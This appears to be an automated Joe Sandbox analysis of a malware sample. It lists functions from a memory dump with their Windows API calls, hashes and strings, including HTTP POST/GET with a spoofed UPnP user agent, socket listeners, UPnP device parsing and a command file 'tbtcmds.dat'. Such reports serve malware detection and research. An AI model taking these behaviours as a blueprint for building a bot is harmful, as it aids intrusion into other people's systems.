                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Time$QuerySecondsSince1980System
                                                                          • String ID:
                                                                          • API String ID: 1987401769-0
                                                                          • Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                                                          • Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
                                                                          • Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                                                          • Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                          • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                          • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                          • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtQueryVirtualMemory.NTDLL ref: 0040F3CA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MemoryQueryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2850889275-0
                                                                          • Opcode ID: cdb5871c7e4a9dfe82dcfd1a22c61253dacbf7643b9d47dc73f44391164f311f
                                                                          • Instruction ID: ed88f62fed3e0664d567f3517dc123a76f672f05ee508a299baa59d95eb885c2
                                                                          • Opcode Fuzzy Hash: cdb5871c7e4a9dfe82dcfd1a22c61253dacbf7643b9d47dc73f44391164f311f
                                                                          • Instruction Fuzzy Hash: 5C61C2316046129BCB39CF29D88066B73A1EB95324B68857BDC15E7ED1E738EC4AC748
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A13C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: HeapsProcess
                                                                          • String ID:
                                                                          • API String ID: 1420622215-0
                                                                          • Opcode ID: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                                                          • Instruction ID: b83f3f2e73c8486dc3452fb2da189838b946440ea4f240f2a2f0ba60deb05fe4
                                                                          • Opcode Fuzzy Hash: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                                                          • Instruction Fuzzy Hash: DD01ECF4904218CADB208F14DD847A9B775AB94304F1482EAD7197A281C2781ED6CF5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff7af40cfe94d130d0b405e5eb26263e5ac1a428011fc9ffc3300cb19f3f678b
                                                                          • Instruction ID: 555dc86a3542d35efdbad61dc8a6f814d06877572403d2e3ea9d75403d7cd939
                                                                          • Opcode Fuzzy Hash: ff7af40cfe94d130d0b405e5eb26263e5ac1a428011fc9ffc3300cb19f3f678b
                                                                          • Instruction Fuzzy Hash: 8D128CB4D00219DFCB48CF99D991AAEFBB2BF88304F24856AE415BB355D734AA01CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                          • Instruction ID: ab6376a2cbfef6d77692bb4ff921bbcbfbf8d9cca3a0456804da462bb9118508
                                                                          • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                          • Instruction Fuzzy Hash: A721C732900204EBC720EF69C88096BB7A5BF44350B4581B9DD15AB685D734FD19C7E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040192C
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                          • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                          • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                          • accept.WS2_32(?,?,?), ref: 004019A8
                                                                          • GetTickCount.KERNEL32 ref: 004019F6
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                          • GetTickCount.KERNEL32 ref: 00401A43
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                          • GetTickCount.KERNEL32 ref: 00401AAB
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 3345448188-3762367603
                                                                          • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
                                                                          • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040E758
                                                                          • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
                                                                          • HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E941
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E94E
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E95B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                          • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                          • API String ID: 2761394606-2217117414
                                                                          • Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
                                                                          • Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                          • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                          • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 2403999931-3762367603
                                                                          • Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
                                                                          • Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040DE28
                                                                          • InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
                                                                          • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040DFF7
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E004
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E011
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                          • String ID: <$GET
                                                                          • API String ID: 1205665004-427699995
                                                                          • Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
                                                                          • Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040CE2C,?), ref: 0040600F
                                                                          • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                          • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                          • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                          • LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040CE2C,?), ref: 00406248
                                                                          Strings
                                                                          • C:\Users\user\tbtcmds.dat, xrefs: 004061C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                          • String ID: C:\Users\user\tbtcmds.dat
                                                                          • API String ID: 1457358591-126538273
                                                                          • Opcode ID: 7e520240d61285c04f860047b94aa52bf4a239b4811b1ff9f098ba9f71f6f04c
                                                                          • Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
                                                                          • Opcode Fuzzy Hash: 7e520240d61285c04f860047b94aa52bf4a239b4811b1ff9f098ba9f71f6f04c
                                                                          • Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                          • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                          • setsockopt.WS2_32 ref: 00401F2C
                                                                          • closesocket.WS2_32(?), ref: 00401F39
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 671207744-0
                                                                          • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
                                                                          • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
                                                                          • Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
                                                                          • Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3168844106-0
                                                                          • Opcode ID: 9b786cfb75bd2c3bd49bc3363be0eeae1962839caf469abeefe4a7505a087006
                                                                          • Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
                                                                          • Opcode Fuzzy Hash: 9b786cfb75bd2c3bd49bc3363be0eeae1962839caf469abeefe4a7505a087006
                                                                          • Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                          • CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
                                                                          • wsprintfW.USER32 ref: 00406456
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstancewsprintf
